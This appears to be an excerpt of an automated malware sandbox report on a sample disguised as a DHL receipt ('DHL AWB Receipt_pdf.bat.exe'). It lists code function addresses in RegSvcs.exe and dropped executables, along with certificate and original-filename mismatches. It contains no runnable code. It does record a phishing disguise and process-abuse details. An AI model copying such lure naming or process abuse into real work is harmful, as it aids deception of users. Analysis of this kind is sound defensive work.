                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E3F210_2_0040E3F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E3F310_2_0040E3F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00401B8310_2_00401B83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00401B9010_2_00401B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E43C10_2_0040E43C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042ED4310_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E60610_2_0040E606
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004026E010_2_004026E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402FD510_2_00402FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402FE010_2_00402FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107A11810_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0106815810_2_01068158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A01AA10_2_010A01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010981CC10_2_010981CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107200010_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD010010_2_00FD0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109A35210_2_0109A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A03E610_2_010A03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F010_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108027410_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010602C010_2_010602C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A059110_2_010A0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109244610_2_01092446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE053510_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108E4F610_2_0108E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFC6E010_2_00FFC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100475010_2_01004750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDC7C010_2_00FDC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE077010_2_00FE0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC68B810_2_00FC68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010AA9A610_2_010AA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE284010_2_00FE2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEA84010_2_00FEA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A010_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF696210_2_00FF6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E8F010_2_0100E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109AB4010_2_0109AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA8010_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01096BD710_2_01096BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0CF210_2_00FD0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107CD1F10_2_0107CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0C0010_2_00FE0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDADE010_2_00FDADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF8DBF10_2_00FF8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080CB510_2_01080CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEAD0010_2_00FEAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01022F2810_2_01022F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01000F3010_2_01000F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01082F3010_2_01082F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01054F4010_2_01054F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF2E9010_2_00FF2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105EFA010_2_0105EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0E5910_2_00FE0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FECFE010_2_00FECFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109EE2610_2_0109EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2FC810_2_00FD2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109CE9310_2_0109CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109EEDB10_2_0109EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE70C010_2_00FE70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010AB16B10_2_010AB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101516C10_2_0101516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEB1B010_2_00FEB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCF17210_2_00FCF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108F0CC10_2_0108F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010970E910_2_010970E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109F0E010_2_0109F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109132D10_2_0109132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFB2C010_2_00FFB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE52A010_2_00FE52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0102739A10_2_0102739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCD34C10_2_00FCD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010812ED10_2_010812ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109757110_2_01097571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD146010_2_00FD1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107D5B010_2_0107D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109F43F10_2_0109F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109F7B010_2_0109F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010916CC10_2_010916CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107591010_2_01075910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE38E010_2_00FE38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104D80010_2_0104D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE995010_2_00FE9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFB95010_2_00FFB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109FB7610_2_0109FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01055BF010_2_01055BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101DBF910_2_0101DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109FA4910_2_0109FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01097A4610_2_01097A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01053A6C10_2_01053A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFFB8010_2_00FFFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01025AA010_2_01025AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107DAAC10_2_0107DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01081AA310_2_01081AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108DAC610_2_0108DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01091D5A10_2_01091D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01097D7310_2_01097D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01059C3210_2_01059C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFFDC010_2_00FFFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE3D4010_2_00FE3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109FCF210_2_0109FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109FF0910_2_0109FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE9EB010_2_00FE9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109FFB110_2_0109FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE1F9210_2_00FE1F92
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_015E5CA011_2_015E5CA0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_015E700811_2_015E7008
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_015EDFA411_2_015EDFA4
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732292E11_2_0732292E
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732299511_2_07322995
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0732980511_2_07329805
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733E71011_2_0733E710
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_07337FB811_2_07337FB8
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_073317C011_2_073317C0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_07338FC011_2_07338FC0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_07335E6811_2_07335E68
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733A6F011_2_0733A6F0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733DA0011_2_0733DA00
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733D29011_2_0733D290
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0733C1B811_2_0733C1B8
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_073374A011_2_073374A0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_07334A9011_2_07334A90
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0753004011_2_07530040
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0753ED5811_2_0753ED58
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0753F5C811_2_0753F5C8
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0753F19011_2_0753F190
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0753FA0011_2_0753FA00
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_077552EC11_2_077552EC
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0775C9D011_2_0775C9D0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_077552DD11_2_077552DD
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_077570B011_2_077570B0
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0775EA7711_2_0775EA77
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0775EA8811_2_0775EA88
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0781375011_2_07813750
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeCode function: 11_2_0781459811_2_07814598
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0576051414_2_05760514
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0576050B14_2_0576050B
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05768C9414_2_05768C94
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0576073414_2_05760734
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575E71414_2_0575E714
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575E70A14_2_0575E70A
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05766E9414_2_05766E94
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_05766E8F14_2_05766E8F
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0577F1B414_2_0577F1B4
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575E86414_2_0575E864
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575E86314_2_0575E863
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575E8AD14_2_0575E8AD
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeCode function: 14_2_0575EA7714_2_0575EA77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014A010017_2_014A0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014F600017_2_014F6000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_015302C017_2_015302C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B053517_2_014B0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014D475017_2_014D4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B077017_2_014B0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014AC7C017_2_014AC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CC6E017_2_014CC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014C696217_2_014C6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B29A017_2_014B29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B284017_2_014B2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014BA84017_2_014BA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014DE8F017_2_014DE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014E889017_2_014E8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014968B817_2_014968B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014AEA8017_2_014AEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014BED7A17_2_014BED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014BAD0017_2_014BAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B8DC017_2_014B8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014AADE017_2_014AADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014C8DBF17_2_014C8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B0C0017_2_014B0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014A0CF217_2_014A0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01524F4017_2_01524F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014F2F2817_2_014F2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014D0F3017_2_014D0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014A2FC817_2_014A2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0152EFA017_2_0152EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B0E5917_2_014B0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014C2E9017_2_014C2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014E516C17_2_014E516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0149F17217_2_0149F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014BB1B017_2_014BB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0149D34C17_2_0149D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B33F317_2_014B33F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CB2C017_2_014CB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CD2F017_2_014CD2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B52A017_2_014B52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014A146017_2_014A1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014F74E017_2_014F74E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B349717_2_014B3497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014BB73017_2_014BB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B995017_2_014B9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CB95017_2_014CB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B599017_2_014B5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0151D80017_2_0151D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B38E017_2_014B38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01525BF017_2_01525BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014EDBF917_2_014EDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CFB8017_2_014CFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01523A6C17_2_01523A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B3D4017_2_014B3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014CFDC017_2_014CFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01529C3217_2_01529C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014C9C2017_2_014C9C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B1F9217_2_014B1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_014B9EB017_2_014B9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042ED4317_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0151EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014F7E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FCB970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0104EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01015130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01027E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0105F290 appears 105 times
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: invalid certificate
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2321794272.00000000033D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2327742800.00000000070D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2317577522.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.2210815987.0000000000106000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameroUW.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2318069311.0000000002511000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2327292490.0000000006A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2328152386.00000000087C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exeBinary or memory string: OriginalFilenameroUW.exe: vs DHL AWB Receipt_pdf.bat.exe
